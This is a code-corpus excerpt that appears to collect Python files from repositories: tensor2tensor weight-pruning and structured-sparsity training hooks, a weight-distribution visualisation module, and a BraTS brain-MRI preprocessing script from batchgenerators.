# hparams.add_hparam("data_dir", FLAGS.data_dir)
# trainer_lib.add_problem_hparams(hparams, FLAGS.problem)
hparams_path = os.path.join(FLAGS.output_dir, "hparams.json")
hparams = trainer_lib.create_hparams(
FLAGS.hparams_set, FLAGS.hparams, data_dir=FLAGS.data_dir,
problem_name=FLAGS.problem, hparams_path=hparams_path)
hparams.add_hparam("model_dir", FLAGS.output_dir)
config = t2t_trainer.create_run_config(hparams)
params = {"batch_size": hparams.batch_size}
# add "_rev" as a hack to avoid image standardization
problem = registry.problem(FLAGS.problem)
input_fn = problem.make_estimator_input_fn(tf.estimator.ModeKeys.EVAL,
hparams)
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False))
model_fn = t2t_model.T2TModel.make_estimator_model_fn(
FLAGS.model, hparams, use_tpu=False)
dataset = input_fn(params, config).repeat()
dataset_iterator = dataset.make_one_shot_iterator()
features, labels = dataset_iterator.get_next()
# tf.logging.info("### t2t_wei_feat_distrib.py features %s", features)
spec = model_fn(
features,
labels,
tf.estimator.ModeKeys.EVAL,
params=hparams,
config=config)
# get the summary model structure graph
summary_writer = tf.summary.FileWriter(FLAGS.log_dir, sess.graph)
# Restore weights
saver = tf.train.Saver()
checkpoint_path = os.path.expanduser(FLAGS.output_dir or
FLAGS.checkpoint_path)
tf.logging.info("### t2t_wei_feat_distrib.py checkpoint_path %s", checkpoint_path)
# saver.restore(sess, tf.train.latest_checkpoint(checkpoint_path))
# Load weights from checkpoint.
ckpts = tf.train.get_checkpoint_state(checkpoint_path)
ckpt = ckpts.model_checkpoint_path
saver.restore(sess, ckpt)
# saver.restore(sess, checkpoint_path+'/model.ckpt-1421000')
# initialize_from_ckpt(checkpoint_path)
# get parameter
pruning_params = create_pruning_params()
pruning_strategy = create_pruning_strategy(pruning_params.strategy)
# get evalutaion graph
if 'image' in FLAGS.problem:
acc, acc_update_op = get_eval_graph_image(spec, labels)
tf.summary.scalar('accuracy', acc)
# define evaluation function
def eval_model():
sess.run(tf.initialize_local_variables())
for _ in range(FLAGS.eval_steps):
acc = sess.run(acc_update_op)
return acc
elif 'translate' in FLAGS.problem:
bleu_op = get_eval_graph_trans(spec, labels)
# tf.summary.scalar('bleu', bleu_op)
# define evaluation function
def eval_model():
bleu_value = 0
# sess.run(tf.initialize_local_variables())
# sess.run()
# local_vars = tf.local_variables()
# tf.logging.info("###!!!!!!! t2t_wei_feat_distrib.py local_vars %s", local_vars)
# for _ in range(FLAGS.eval_steps):
for _ in range(FLAGS.eval_steps):
# outputs_tensor, labels_tensor, preds_tensor = sess.run([outputs, labels, preds])
bleu = sess.run(bleu_op)
# tf.logging.info("### t2t_wei_feat_distrib.py outputs_tensor %s", outputs_tensor[0].shape)
# tf.logging.info("### t2t_wei_feat_distrib.py labels_tensor %s", labels_tensor[0].shape)
# tf.logging.info("### t2t_wei_feat_distrib.py preds %s", preds_tensor[0].shape)
bleu_value += bleu
bleu_value /= FLAGS.eval_steps
return bleu_value
# get weight distribution graph
wei_feat_distrib.get_weight_distrib_graph(pruning_params)
# do accuracy sparsity tradeoff for model weights
wei_feat_distrib.wei_sparsity_acc_tradeoff(sess, eval_model, pruning_strategy, pruning_params, summary_writer)
# do accuracy sparsity tradeoff for model weights
# save the summary
summary_writer.close()
sess.run(tf.initialize_local_variables())
preds = spec.predictions["predictions"]
# features_shape=tf.shape(features)
pred_shape=tf.shape(preds)
labels_shape=tf.shape(labels)
# tf.logging.info("###---- t2t_wei_feat_distrib.py feature preds %s", features)
# tf.logging.info("###---- t2t_wei_feat_distrib.py shape preds %s", sess.run([pred_shape, labels_shape]))
# tf.logging.info("###---- t2t_wei_feat_distrib.py shape labels_shape %s", sess.run(labels_shape))
# print weight distribution to terminal
# wei_feat_distrib.print_weight_distrib(sess, pruning_params)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
```
#### File: tensor2tensor/utils/ssl_hooks.py
```python
import tensorflow as tf
import pickle
'''
define all the hooks for structured sparsity (SSL) training
(1) SSLEvalHook:
SSLEvalHook is only used during the SSL training step with Group Lasso regularization.
SSLEvalHook is executed during evaluation and zeroes out
weights below a small threshold to stabilize the sparsity.
(2) SSLFinetuneHook:
SSLFinetuneHook is only used during the SSL finetune step to restore the accuracy.
For a complete SSL training procedure, a pretrained model should first do SSL training, then do SSL fine tuning:
pretrained model -> [SSL training] -> [SSL fine tuning] -> final model
'''
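# A minimal usage sketch (assumption: an Estimator-based training loop exists elsewhere
# in this project; the `estimator` / `train_input_fn` names below are hypothetical):
#
#   ssl_eval_hook = SSLEvalHook(zero_threshold=1e-4)      # attach to evaluation during SSL training
#   finetune_hook = SSLFinetuneHook(zero_threshold=1e-4)  # attach to training during SSL fine-tuning
#   estimator.train(input_fn=train_input_fn, hooks=[finetune_hook])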
'''
decide which layers to prune using the given white list and black list
'''
def should_prune_v1(w, white_list, black_list):
in_whitelist = not white_list or any(
e in w.name for e in white_list)
in_blacklist = any(e in w.name for e in black_list)
if white_list and not in_whitelist:
return False
elif in_blacklist:
return False
return True
'''
decide which layers to prune by dimension:
(1): only retain fully connected (2-D) layers
(2): discard embedding layers
'''
def should_prune_v2(w, dim=2):
dims = w.get_shape().as_list()
num_dims = len(dims)
if num_dims == dim and 'body' in w.op.name and 'target_space_embedding' not in w.op.name and 'symbol_modality_' not in w.op.name:
return True
return False
def fill_sparsity_summary(sparsity_summary, sparisty, layer_name, layer_dim):
if 'body' not in layer_name:
sparsity_summary[layer_name] = sparisty
else:
sub_names = layer_name.split('/')
assert(len(sub_names)>1)
layer_idx = codec = sub_block_dim = sub_block_idx = None
for n in sub_names:
n = str(n)
if n.startswith('layer_'):
layer_idx = 1+int(n.split('_')[-1])
elif n.startswith('_sub_block'):
token = n.split('_')
sub_block_dim = (int(token[5]), int(token[8]))
sub_block_idx = (int(token[4]), int(token[7]))
elif n=='encoder':
codec = n
elif n=='decoder':
codec = n
tf.logging.info("%s", layer_name)
tf.logging.info("%s %s %s %s", layer_idx, codec, sub_block_dim, sub_block_idx)
assert(layer_idx and codec and sub_block_dim and sub_block_idx)
if 'q' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['q'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'k' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['k'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'v' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['v'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'output_transform' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['output_transform'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'ffn' in sub_names and 'conv1' in sub_names:
layer_summary = sparsity_summary['ffn_1'][codec]
elif 'ffn' in sub_names and 'conv2' in sub_names:
layer_summary = sparsity_summary['ffn_2'][codec]
if layer_idx not in layer_summary:
num_sub_block = sub_block_dim[0]*sub_block_dim[1]
layer_summary[layer_idx] = {'sub_block_dim': sub_block_dim,
'row_sparsity': [None]*num_sub_block,
'col_sparsity': [None]*num_sub_block,
'random_sparsity':[None]*num_sub_block,}
layer_summary = layer_summary[layer_idx]
sub_block_idx_1d = sub_block_idx[0]*sub_block_dim[1]+sub_block_idx[1]
tf.logging.info("%s %s", layer_summary['sub_block_dim'], sub_block_dim)
tf.logging.info("%s", layer_name)
assert(layer_summary['sub_block_dim']==sub_block_dim)
assert(layer_summary['row_sparsity'][sub_block_idx_1d]==None)
assert(layer_summary['col_sparsity'][sub_block_idx_1d]==None)
assert(layer_summary['random_sparsity'][sub_block_idx_1d]==None)
layer_summary['row_sparsity'][sub_block_idx_1d] = sparisty['row']
layer_summary['col_sparsity'][sub_block_idx_1d] = sparisty['col']
layer_summary['random_sparsity'][sub_block_idx_1d] = sparisty['elt']
sparsity_summary['total_weights'] += sub_block_dim[0]*sub_block_dim[1]
sparsity_summary['total_nonzero_structured_weights'] += sub_block_dim[0]*sub_block_dim[1]*(1-sparisty['row'])*(1-sparisty['col'])
'''
print sparsity result of model
'''
def print_sparsity_info(sparsity_results, print_level=0, save_sparsity_info=False):
sparsity_dict = {}
for name, sparsity in sparsity_results.iteritems():
layer_name = name[:-13]
if layer_name in sparsity_dict:
sparsity_dict[layer_name][name[-3:]] = sparsity
else:
sparsity_dict[layer_name] = {'elt': 0, 'col': 0, 'row': 0}
sparsity_dict[layer_name][name[-3:]] = sparsity
var_list = tf.trainable_variables()
sparsity_summary = {'ffn_1':
{'encoder':{}, 'decoder':{}},
'ffn_2':
{'encoder':{}, 'decoder':{}},
'multihead_attention':
{'output_transform': {'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}},
'q':{'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}},
'k':{'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}},
'v':{'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}}},
'total_weights': 0,
'total_nonzero_structured_weights': 0}
tf.logging.info("##############################################")
for layer_name, sparsities in sparsity_dict.iteritems():
for v in var_list:
if v.op.name == layer_name:
dims = v.get_shape().as_list()
if print_level>0:
tf.logging.info("--- Layer: %s of Dimension: %s--", layer_name, dims)
break
if print_level>0:
tf.logging.info(" Overall Random Sparsity: %0.4f %%", sparsities['elt']*100)
tf.logging.info(" Row Sparsity: %0.4f %%", sparsities['row']*100)
tf.logging.info(" Column Sparsity: %0.4f %%", sparsities['col']*100)
fill_sparsity_summary(sparsity_summary, sparsities, layer_name, dims)
tf.logging.info("%s", sparsity_summary)
if save_sparsity_info:
pickle.dump(sparsity_summary, open("sparsity_summary.p", "wb"))
tf.logging.info("##############################################")
class SSLEvalHook(tf.train.SessionRunHook):
def __init__(self, zero_threshold):
self.zero_threshold = zero_threshold
self.sparsity = {}
tf.logging.info("### transformer.py: _LoggerHook initialized")
def begin(self):
tf.logging.info("### transformer.py: _LoggerHook begin")
# get weights
weights = tf.trainable_variables()
weights = [w for w in weights if should_prune_v2(w)]
# establish a graph that zeroes out weights below a small threshold and prints sparsity statistics
for train_var in weights:
# zerout by small threshold to stablize the sparsity
sp_name = train_var.op.name
# self.zero_threshold = max(self.zero_threshold, 2*config_params['weight_decay'])
where_cond = tf.less(tf.abs(train_var), self.zero_threshold)
train_var = tf.assign(train_var,
tf.where(where_cond, tf.zeros(tf.shape(train_var)), train_var))
# statistics
s = tf.nn.zero_fraction(train_var)
self.sparsity[sp_name + '_sparsity_elt'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(train_var), axis=0))
self.sparsity[sp_name + '_sparsity_col'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(train_var), axis=1))
self.sparsity[sp_name + '_sparsity_row'] = s
# print sparisty results after creating the session
def after_create_session(self, session, coord):
sparsity_results = session.run(self.sparsity)
print_sparsity_info(sparsity_results)
def before_run(self, run_context):
pass
def after_run(self, run_context, run_values):
pass
class SSLInitialWeightHook(tf.train.SessionRunHook):
def __init__(self, warm_start_from):
tf.logging.info("ssl_hooks.py: Checkpoint dir: %s", warm_start_from)
self.warm_start_from = warm_start_from
# variable_map = {}
# for var in tf.contrib.framework.get_trainable_variables():
# var_name = var.name.split(":")[0]
# if reader.has_tensor(var_name):
# tf.logging.info("Loading variable from checkpoint: %s", var_name)
# variable_map[var_name] = var
# else:
# tf.logging.info("Cannot find variable in checkpoint, skipping: %s",
# var_name)
# tf.train.init_from_checkpoint(ckpt_dir, variable_map)
# tf.logging.info("### ssl_hooks.py: SSLInitialWeightHook initialized")
'''
Given the new layer name, return the corresponding old layer tensor
'''
def find_layer_tensor(self, new_name):
name = new_name[new_name.find('/'):]
name = self.old_model_name+name
if '_sub_block' in name:
name = name.split('/')
for n in name:
if '_sub_block' in n:
pos_info_str = n
break
name.remove(pos_info_str)
name = '/'.join(name)
tensor = self.reader.get_tensor(name)
# print (name)
shape_tensor = self.var_to_shape_map[name]
# print ('----', shape_tensor)
pos_info = []
for i in pos_info_str.split('_'):
if unicode(i, 'utf-8').isnumeric():
pos_info.append(int(i))
input_idx, in_group, output_idx, out_group = pos_info
# Deal with bias
if len(shape_tensor)==1:
col_left_bound = int(shape_tensor[0]*float(output_idx)/out_group)
col_right_bound = int(shape_tensor[0]*float(output_idx+1)/out_group)
tensor = tensor[col_left_bound:col_right_bound]
return tensor/in_group
# deal with kernel
row_left_bound = int(shape_tensor[0]*float(input_idx)/in_group)
row_right_bound = int(shape_tensor[0]*float(input_idx+1)/in_group)
col_left_bound = int(shape_tensor[1]*float(output_idx)/out_group)
col_right_bound = int(shape_tensor[1]*float(output_idx+1)/out_group)
# print (row_left_bound, row_right_bound, col_left_bound, col_right_bound)
tensor = tensor[row_left_bound:row_right_bound, col_left_bound:col_right_bound]
return tensor
else:
tensor = self.reader.get_tensor(name)
return self.reader.get_tensor(name)
def weight_initialization_graph(self):
self.set_weight_op = tf.no_op()
weights = tf.trainable_variables()
for w in weights:
# print (w.op.name)
# print (self.layer_tensor_map[w.op.name].shape)
w = tf.assign(w, self.layer_tensor_map[w.op.name])
self.set_weight_op = tf.group(self.set_weight_op, w)
def begin(self):
tf.logging.info("### ssl_hooks.py: SSLInitialWeightHook begin")
self.layer_tensor_map = {}
# Get the new model name(new ssl model) and old model name(warm start from)
new_model_name = tf.contrib.framework.get_trainable_variables()[0]
# print (new_model_name)
new_model_name = new_model_name.name.split(":")[0]
self.new_model_name = new_model_name[:new_model_name.find('/')]
self.reader = tf.contrib.framework.load_checkpoint(self.warm_start_from)
self.var_to_shape_map = self.reader.get_variable_to_shape_map()
# print ('############# OLD MODEL NAME #############')
# print (self.var_to_shape_map.keys())
old_model_name = self.var_to_shape_map.keys()[0]
old_model_name = old_model_name.split('/')
for i in range(len(old_model_name)):
if old_model_name[i]=='body':
self.old_model_name = old_model_name[i-1]
break
# Generate the map from new layer name to its initilization tensor from old layer name
for var in tf.contrib.framework.get_trainable_variables():
var_name = var.name.split(":")[0]
self.layer_tensor_map[var_name] = self.find_layer_tensor(var_name)
# Generate the weight initialization graph
self.weight_initialization_graph()
def after_create_session(self, session, coord):
tf.logging.info("### ssl_hooks.py: SSLInitialWeightHook after_create_session")
session.run(self.set_weight_op)
def before_run(self, run_context):
pass
def after_run(self, run_context, run_values):
pass
class SSLFinetuneHook(tf.train.SessionRunHook):
def __init__(self, zero_threshold):
self.zero_threshold = zero_threshold
self.save_sparsity_info = True
self.sparsity = {}
self.white_list = ['atten']
self.black_list = ['bias']
'''
implement the pruning strategy and generate:
self.set_weight_op: operator that sets weights to 0 based on zero_threshold
self.zero_mask: tensor that gets the zero_mask to zerout the future gradient update
self.sparsity: tensor to get the model sparsity information
'''
def ssl_pruning(self, weights):
self.set_weight_op = tf.no_op()
self.zero_mask = {}
self.sparsity = {}
for w in weights:
# w_shape = tf.map_fn(lambda x: (x), tf.shape(w))
row, col = w.get_shape()
w_name = w.op.name
if 'body' in w_name:
# get the where condition of structure sparsity
abs_w = tf.abs(w)
col_max_w = tf.reduce_max(abs_w, axis=0)
row_max_w = tf.reduce_max(abs_w, axis=1)
where_cond_col = tf.expand_dims(tf.less(col_max_w, self.zero_threshold), axis=0)
where_cond_col = tf.tile(where_cond_col, [row, 1])
where_cond_row = tf.expand_dims(tf.less(row_max_w, self.zero_threshold), axis=1)
where_cond_row = tf.tile(where_cond_row, [1, col])
where_cond = tf.logical_or(where_cond_col, where_cond_row)
# sets weights to 0 based on zero_threshold
w = tf.assign(w,
tf.where(where_cond, tf.zeros_like(w), w))
self.set_weight_op = tf.group(self.set_weight_op, w)
# gets the zero_mask to zerout the future gradient update
mask = tf.where(where_cond, tf.zeros_like(w), tf.ones_like(w))
self.zero_mask[w_name+'_mask'] = mask
# get the model sparsity information
s = tf.nn.zero_fraction(mask)
self.sparsity[w_name + '_sparsity_elt'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(w), axis=0))
self.sparsity[w_name + '_sparsity_col'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(w), axis=1))
self.sparsity[w_name + '_sparsity_row'] = s
# generate the operation zerout weights with masks during each training steps
def zerout_weights_with_masks(self, weights):
self.mask_placeholders = {}
self.zerout_op = tf.no_op()
for w in weights:
# w_shape = tf.shape(w)
w_shape = w.get_shape()
w_name = w.op.name
# store the mask placeholder for future assignment
mask_placeholder = tf.placeholder(w.dtype, shape=w_shape)
self.mask_placeholders[w_name+'_mask']=mask_placeholder
# update weight
updated_weight = tf.multiply(w, mask_placeholder)
op = tf.assign(w, updated_weight)
self.zerout_op = tf.group(self.zerout_op, op)
def begin(self):
tf.logging.info("### transformer.py: _SSLfinetuneHook begin")
# get weights
weights = tf.trainable_variables()
weights = [w for w in weights if should_prune_v2(w)]
# establish graphs to prune weight, get mask, and print sparsity before session run
self.ssl_pruning(weights)
# establish a graph to zerout weights with masks during each training steps
self.zerout_weights_with_masks(weights)
def after_create_session(self, session, coord):
# sets weights to 0 based on zero_threshold
session.run(self.set_weight_op)
# get zero masks to zerout weights with masks during each training steps
self.zero_masks_np = session.run(self.zero_mask)
# print the final structure sparsity
sparsity_results = session.run(self.sparsity)
print_sparsity_info(sparsity_results, save_sparsity_info=self.save_sparsity_info)
self.save_sparsity_info=False
def before_run(self, run_context):
'''
Unlike Wei's implementation, which applies the zero masks to the gradients before the weight update,
here the zero masks are applied to the weights after they have been updated with the gradients.
The two approaches achieve the same result.
'''
zero_masks_dict={}
# for i, placeholder in enumerate((self.mask_placeholders.values())):
# zero_masks_dict[placeholder] = self.zero_masks_np[i]
for name, placeholder in self.mask_placeholders.iteritems():
if name in self.zero_masks_np.keys():
zero_masks_dict[placeholder] = self.zero_masks_np[name]
else:
raise ValueError('Can not found zero_mask of layer: %s', name)
return tf.train.SessionRunArgs(self.zerout_op, feed_dict=zero_masks_dict)
def after_run(self, run_context, run_values):
# check the weight sparsity for debug purpose
# tf.logging.info("### ssl_hooks.py: after_run executed tensors: ----%s", run_values.results)
pass
```
#### File: tensor2tensor/visualization/wei_feat_distrib.py
```python
import numpy as np
from tensor2tensor.layers import common_layers
from tensor2tensor.utils import registry
import tensorflow as tf
import math
@registry.register_pruning_strategy
def weight(w, sparsity):
    """Weight-level magnitude pruning."""
    w_shape = common_layers.shape_list(w)
    k = int(np.prod(w_shape[:-1]))
    count = tf.to_int32(k * sparsity)
    mask = common_layers.weight_targeting(w, count)
    return (1 - mask) * w if len(w_shape) > 1 else w
@registry.register_pruning_strategy
def unit(w, sparsity):
    """Unit-level magnitude pruning."""
    w_shape = common_layers.shape_list(w)
    count = tf.to_int32(w_shape[-1] * sparsity)
    mask = common_layers.unit_targeting(w, count)
    return (1 - mask) * w if len(w_shape) > 1 else w
def should_show(name, pruning_params):
    """Whether to show the layer's distribution or not."""
    in_whitelist = not pruning_params.white_list or any(
        e in name for e in pruning_params.white_list)
    in_blacklist = any(e in name for e in pruning_params.black_list)
    if pruning_params.white_list and not in_whitelist:
        return False
    elif in_blacklist:
        return False
    return True
def feat_sparsity_acc_tradeoff():
    pass
# def wei_sparsity_acc_tradeoff():
#     pass
def feat_distrib(sess, eval_model, pruning_strategy, pruning_params, num_steps=10):
    pass
def get_weight_distrib_graph(pruning_params):
    weights = tf.trainable_variables()
    weights = [w for w in weights if should_show(w.name, pruning_params)]
    weights_name = [w.name for w in weights]
    for weight, weight_name in zip(weights, weights_name):
        tf.summary.histogram('Weight Hist-' + weight_name, weight)
def print_weight_distrib(sess, pruning_params, num_steps=10):
    weights = tf.trainable_variables()
    # tf.logging.info("### wei_feat_distrib.py layer names %s", weights)
    weights = [w for w in weights if should_show(w.name, pruning_params)]
    weights_name = [w.name for w in weights]
    weights = sess.run(weights)
    for weight, weight_name in zip(weights, weights_name):
        weight = np.absolute(weight)
        max_weight = weight.max()
        hist, bin_edges = np.histogram(
            weight,
            bins=np.arange(0, max_weight + 0.000001, max_weight / num_steps),
            density=True)
        hist /= hist.sum()
        tf.logging.info(
            "\n ---" + weight_name + "\n Hist: %s \n Range: (%0.1f - %0.5f) \n Step: %0.5f",
            hist, bin_edges[0], bin_edges[-1], max_weight / num_steps)
def wei_sparsity_acc_tradeoff(sess, eval_model, pruning_strategy, pruning_params, summary_writer):
    """Prune the weights of a model and evaluate."""
    # tf.logging.info("### wei_feat_distrib.py Weight sparsity accuracy tradeoff ###")
    weights = tf.trainable_variables()
    weights = [w for w in weights if should_show(w.name, pruning_params)]
    # tf.logging.info("Pruning weights: %s" % weights.shape)
    # tf.logging.info("Pruning weights: %s" % weights[1])
    unpruned_weights = sess.run(weights)
    # tf.logging.info("debugggg: %s" % unpruned_weights[1])
    reset_op = tf.no_op()
    for w, ow in zip(weights, unpruned_weights):
        op = tf.assign(w, ow)
        reset_op = tf.group(reset_op, op)
    for step, sparsity in enumerate(pruning_params.weight_sparsities):
        set_weights_op = tf.no_op()
        for w in weights:
            op = tf.assign(w, pruning_strategy(w, sparsity))
            set_weights_op = tf.group(set_weights_op, op)
        sess.run(set_weights_op)
        acc = eval_model()
        tf.logging.info("\tPruning to sparsity = %f: acc or bleu = %f" % (sparsity, acc))
        sess.run(reset_op)
        merged = tf.summary.merge_all()
        summary = sess.run(merged)
        summary_writer.add_summary(summary, step)
```
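As a quick illustration of what `print_weight_distrib` reports, the standalone NumPy sketch below (not part of the module above; the layer shape and bin count are made up) buckets the absolute weight values of one matrix into `num_steps` equal-width bins and normalizes the counts, so the first buckets show how much of the layer sits near zero and is therefore a natural pruning candidate.

```python
import numpy as np

num_steps = 10
w = np.random.randn(256, 256).astype(np.float32)  # stand-in for one layer's weights

abs_w = np.abs(w)
max_w = abs_w.max()
hist, bin_edges = np.histogram(
    abs_w, bins=np.arange(0, max_w + 1e-6, max_w / num_steps))
hist = hist / hist.sum()  # fraction of weights in each magnitude bucket

print("Hist:", np.round(hist, 3))
print("Range: (%.1f - %.5f), Step: %.5f" % (bin_edges[0], bin_edges[-1], max_w / num_steps))
```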
{
"source": "Jiachenn99/batchgenerators",
"score": 2
}
#### File: examples/brats2017/brats2017_preprocessing.py
```python
import numpy as np
# from batchgenerators.examples.brats2017.config import brats_preprocessed_folder, \
#     brats_folder_with_downloaded_train_data, num_threads_for_brats_example
from batchgenerators.examples.brats2017.config import num_threads_for_brats_example
from batchgenerators.utilities.file_and_folder_operations import *
try:
    import SimpleITK as sitk
except ImportError:
    print("You need to have SimpleITK installed to run this example!")
    raise ImportError("SimpleITK not found")
from multiprocessing import Pool
def get_list_of_files(base_dir):
    """
    returns a list of lists containing the filenames. The outer list contains all training examples. Each entry in the
    outer list is again a list pointing to the files of that training example in the following order:
    T1, T1c, T2, FLAIR, segmentation
    :param base_dir:
    :return:
    """
    list_of_lists = []
    for glioma_type in ['HGG', 'LGG']:
        current_directory = join(base_dir, glioma_type)
        # print(current_directory)
        patients = subfolders(current_directory, join=False)
        for p in patients:
            # print(p)
            patient_directory = join(current_directory, p)
            t1_file = join(patient_directory, p + "_t1.nii.gz")
            t1c_file = join(patient_directory, p + "_t1ce.nii.gz")
            t2_file = join(patient_directory, p + "_t2.nii.gz")
            flair_file = join(patient_directory, p + "_flair.nii.gz")
            seg_file = join(patient_directory, p + "_seg.nii.gz")
            this_case = [t1_file, t1c_file, t2_file, flair_file, seg_file]
            assert all((isfile(i) for i in this_case)), \
                "some file is missing for patient %s; make sure the following " \
                "files are there: %s" % (p, str(this_case))
            list_of_lists.append(this_case)
    print("Found %d patients" % len(list_of_lists))
    return list_of_lists
def get_list_of_files_validation_2018(base_dir):
    """
    returns a list of lists containing the filenames. The outer list contains all validation examples. Each entry in
    the outer list is again a list pointing to the files of that case in the following order:
    T1, T1c, T2, FLAIR (the validation data has no segmentation)
    :param base_dir:
    :return:
    """
    list_of_lists = []
    # current_directory = join(base_dir, glioma_type)
    current_directory = base_dir
    # print(current_directory)
    patients = subfolders(current_directory, join=False)
    for p in patients:
        # print(p)
        patient_directory = join(current_directory, p)
        t1_file = join(patient_directory, p + "_t1.nii.gz")
        t1c_file = join(patient_directory, p + "_t1ce.nii.gz")
        t2_file = join(patient_directory, p + "_t2.nii.gz")
        flair_file = join(patient_directory, p + "_flair.nii.gz")
        # seg_file = join(patient_directory, p + "_seg.nii.gz")
        # this_case = [t1_file, t1c_file, t2_file, flair_file, seg_file]
        this_case = [t1_file, t1c_file, t2_file, flair_file]
        assert all((isfile(i) for i in this_case)), \
            "some file is missing for patient %s; make sure the following " \
            "files are there: %s" % (p, str(this_case))
        list_of_lists.append(this_case)
    print("Found %d patients" % len(list_of_lists))
    return list_of_lists
def load_and_preprocess(case, patient_name, output_folder):
    """
    loads, preprocesses and saves a case
    This is what happens here:
    1) load all images and stack them to a 4d array
    2) crop to nonzero region, this removes unnecessary zero-valued regions and reduces computation time
    3) normalize the nonzero region with its mean and standard deviation
    4) save 4d tensor as numpy array. Also save metadata required to create niftis again (required for export
    of predictions)
    :param case:
    :param patient_name:
    :return:
    """
    # load SimpleITK Images
    imgs_sitk = [sitk.ReadImage(i) for i in case]
    # get pixel arrays from SimpleITK images
    imgs_npy = [sitk.GetArrayFromImage(i) for i in imgs_sitk]
    # get some metadata
    spacing = imgs_sitk[0].GetSpacing()
    # the spacing returned by SimpleITK is in inverse order relative to the numpy array we receive. If we wanted to
    # resample the data and if the spacing was not isotropic (in BraTS all cases have already been resampled to 1x1x1mm
    # by the organizers) then we need to pay attention here. Therefore we bring the spacing into the correct order so
    # that spacing[0] actually corresponds to the spacing of the first axis of the numpy array
    spacing = np.array(spacing)[::-1]
    direction = imgs_sitk[0].GetDirection()
    origin = imgs_sitk[0].GetOrigin()
    original_shape = imgs_npy[0].shape
    # now stack the images into one 4d array, cast to float because we will get rounding problems if we don't
    imgs_npy = np.concatenate([i[None] for i in imgs_npy]).astype(np.float32)
    # now find the nonzero region and crop to that
    nonzero = [np.array(np.where(i != 0)) for i in imgs_npy]
    nonzero = [[np.min(i, 1), np.max(i, 1)] for i in nonzero]
    nonzero = np.array([np.min([i[0] for i in nonzero], 0), np.max([i[1] for i in nonzero], 0)]).T
    # nonzero now has shape 3, 2. It contains the (min, max) coordinate of nonzero voxels for each axis
    # now crop to nonzero
    imgs_npy = imgs_npy[:,
                        nonzero[0, 0]: nonzero[0, 1] + 1,
                        nonzero[1, 0]: nonzero[1, 1] + 1,
                        nonzero[2, 0]: nonzero[2, 1] + 1,
                        ]
    # now we create a brain mask that we use for normalization
    nonzero_masks = [i != 0 for i in imgs_npy[:-1]]
    brain_mask = np.zeros(imgs_npy.shape[1:], dtype=bool)
    for i in range(len(nonzero_masks)):
        brain_mask = brain_mask | nonzero_masks[i]
    # now normalize each modality with its mean and standard deviation (computed within the brain mask)
    for i in range(len(imgs_npy) - 1):
        mean = imgs_npy[i][brain_mask].mean()
        std = imgs_npy[i][brain_mask].std()
        imgs_npy[i] = (imgs_npy[i] - mean) / (std + 1e-8)
        imgs_npy[i][brain_mask == 0] = 0
    # the segmentation of brats has the values 0, 1, 2 and 4. This is pretty inconvenient to say the least.
    # We move everything that is 4 to 3
    imgs_npy[-1][imgs_npy[-1] == 4] = 3
    # now save as npy
    np.save(join(output_folder, patient_name + ".npy"), imgs_npy)
    metadata = {
        'spacing': spacing,
        'direction': direction,
        'origin': origin,
        'original_shape': original_shape,
        'nonzero_region': nonzero
    }
    save_pickle(metadata, join(output_folder, patient_name + ".pkl"))
def save_segmentation_as_nifti(segmentation, metadata, output_file):
    original_shape = metadata['original_shape']
    seg_original_shape = np.zeros(original_shape, dtype=np.uint8)
    nonzero = metadata['nonzero_region']
    seg_original_shape[nonzero[0, 0]: nonzero[0, 1] + 1,
                       nonzero[1, 0]: nonzero[1, 1] + 1,
                       nonzero[2, 0]: nonzero[2, 1] + 1] = segmentation
    sitk_image = sitk.GetImageFromArray(seg_original_shape)
    sitk_image.SetDirection(metadata['direction'])
    sitk_image.SetOrigin(metadata['origin'])
    # remember to revert spacing back to sitk order again
    sitk_image.SetSpacing(tuple(metadata['spacing'][[2, 1, 0]]))
    sitk.WriteImage(sitk_image, output_file)
if __name__ == "__main__":
    # This is the same preprocessing I used for our contributions to the BraTS 2017 and 2018 challenges.
    # Preprocessing is described in the documentation of load_and_preprocess
    # The training data is identical between BraTS 2017 and 2018. You can request access here:
    # https://ipp.cbica.upenn.edu/#BraTS18_registration
    # brats_base points to where the extracted downloaded training data is
    # preprocessed data is saved as npy. This may seem odd if you are familiar with medical images, but trust me it's
    # the best way to do this for deep learning. It does not make much of a difference for BraTS, but if you are
    # dealing with larger images this is crucial for your pipelines to not get stuck in a CPU bottleneck. What we can
    # do with numpy arrays is we can load them via np.load(file, mmap_mode="r") and then read just parts of it on the
    # fly during training. This is super important if your patch size is smaller than the size of the entire patient
    # (for example if you work with large CT data or if you need 2D slices).
    # For this to work properly the output_folder (or wherever the data is stored during training) must be on an SSD!
    # HDDs are usually too slow and you also wouldn't want to do this over a network share (there are exceptions but
    # take this as a rule of thumb)
    # Why is this not an IPython Notebook you may ask? Because I HATE IPython Notebooks. Simple :-)
    brats_preprocessed_folder = "C:/Users/JiachennCJC/Documents/GitHub/batchgenerators/brats_data_preprocessed/BraTS2018Validation_preprocessed"
